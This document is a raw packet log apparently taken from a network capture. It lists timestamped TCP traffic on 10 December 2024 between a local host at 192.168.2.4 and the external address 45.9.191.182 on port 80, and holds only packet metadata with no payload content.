Dec 10, 2024 13:10:59.258271933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.258325100 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.258548975 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.258559942 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.258600950 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.259582043 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.259974957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.260015965 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.260533094 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.261190891 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.261226892 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.261603117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.261632919 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.261671066 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.262738943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.262748957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.262797117 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.263634920 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.263689041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.263736010 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.264672995 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.264870882 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.264909983 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.265743971 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.265796900 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.265841007 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.266725063 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.267148018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.267199993 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.267733097 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.267776966 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.267818928 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.268778086 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.268888950 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.268933058 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.269942045 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.269953966 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.269996881 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.270833969 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.270895004 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.270941973 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.271900892 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.271981001 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.272022009 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.276401997 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276417017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276470900 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.276560068 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276571989 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276585102 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276633024 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.276917934 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276963949 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.276984930 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.276997089 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.277046919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.277080059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.277721882 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.277766943 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.279551029 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.280390024 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.280431986 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.281857967 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.336653948 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.417529106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.417541981 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.417601109 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.417985916 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.417996883 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.418035984 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.418912888 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.418922901 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.418962002 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.420017004 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.420027971 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.420070887 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.420963049 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.421303034 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.421349049 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.421914101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.422030926 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.422084093 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.423126936 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.423137903 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.423187971 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.424015045 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.424194098 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.424238920 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.425165892 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.425174952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.425225019 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.426136017 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.426214933 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.426264048 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.427084923 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.427323103 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.427370071 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.428128958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.428225994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.428272963 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.429187059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.429198027 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.429245949 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.430125952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.430313110 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.430368900 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.431160927 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.431324959 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.431380033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.432220936 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.432347059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.432394981 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.433271885 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.433324099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.433361053 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.434273958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.434453011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.434500933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.435368061 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.435488939 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.435530901 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.436346054 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.436357021 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.436397076 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.437366962 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.437443018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.437489033 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.438332081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.438483000 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.438528061 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.439378023 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.439397097 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.439441919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.440459013 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.440555096 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.440598965 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.441451073 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.441462994 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.441498995 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.442476034 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.442572117 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.442612886 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.443494081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.443569899 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.443615913 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.444540977 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.444583893 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.444628000 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.445544958 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.445914984 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.445991993 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.446732044 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.446742058 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.446805954 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.447623968 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.447637081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.447689056 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.448708057 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.448976040 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.449023962 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.450403929 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.450529099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.450573921 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.451399088 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.451410055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.451461077 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.452625990 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.452636003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.452683926 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.453119993 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.453742027 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.453788996 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.454277039 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.454287052 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.454332113 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.454952002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.455040932 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.455077887 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.455794096 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.456243992 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.456298113 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.456859112 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.456870079 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.456912041 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.457829952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.457890987 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.457936049 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.458936930 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.458946943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.458998919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.459903002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.460967064 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.460978031 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.461014986 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.461024046 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.461070061 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.462033033 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.462086916 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.462137938 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.463000059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.463011026 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.463057041 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.464055061 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.464123964 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.464168072 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.465023041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.465147018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.465198040 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.466283083 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.466412067 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.466459990 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.467366934 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.467379093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.467420101 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.468385935 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.468466997 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.468514919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.469156981 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.469170094 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.469213009 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.470159054 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.470640898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.470691919 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.471139908 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.524216890 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.609669924 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.609766960 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.609826088 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.610146046 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.610295057 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.610336065 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.611207962 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.611293077 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.611326933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.612194061 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.612274885 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.612315893 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.613368988 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.613409996 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.613451958 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.614320993 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.614399910 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.614447117 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.615428925 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.615439892 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.615493059 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.616281033 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.616292000 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.616339922 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.617343903 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.617459059 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.617505074 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.618439913 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.618453026 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.618498087 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.619453907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.619576931 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.619626045 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.620421886 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.621284962 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.621321917 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.621583939 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.621596098 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.621628046 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.622442007 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.622534037 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.622576952 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.623492002 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.623863935 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.623902082 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.624531031 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.624556065 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.624598980 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.625540018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.625725985 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.625770092 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.627392054 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.627477884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.627522945 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.628221989 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.628238916 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.628293037 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.629249096 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.629589081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.629637003 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.630234003 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.630424023 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.630462885 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.631129980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.631143093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.631200075 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.632025957 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.632154942 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.632200003 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.632888079 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.633289099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.633332014 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.634042025 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.634136915 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.634181023 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.635004997 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.635226011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.635268927 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.635951996 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.636063099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.636101961 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.636960030 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.637103081 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.637147903 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.637876034 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.638147116 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.638190031 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.638948917 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.639370918 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.639417887 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.639913082 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.640284061 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.640321016 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.640960932 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.641697884 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.641745090 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.641962051 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.642128944 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.642168999 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.642997980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.643008947 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.643048048 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.644046068 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.644190073 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.644236088 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.645111084 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.645122051 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.645164013 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.646054029 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.646496058 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.646543980 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.647140980 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.647241116 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.647299051 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.648152113 CET	80	49735	45.9.191.182	192.168.2.4
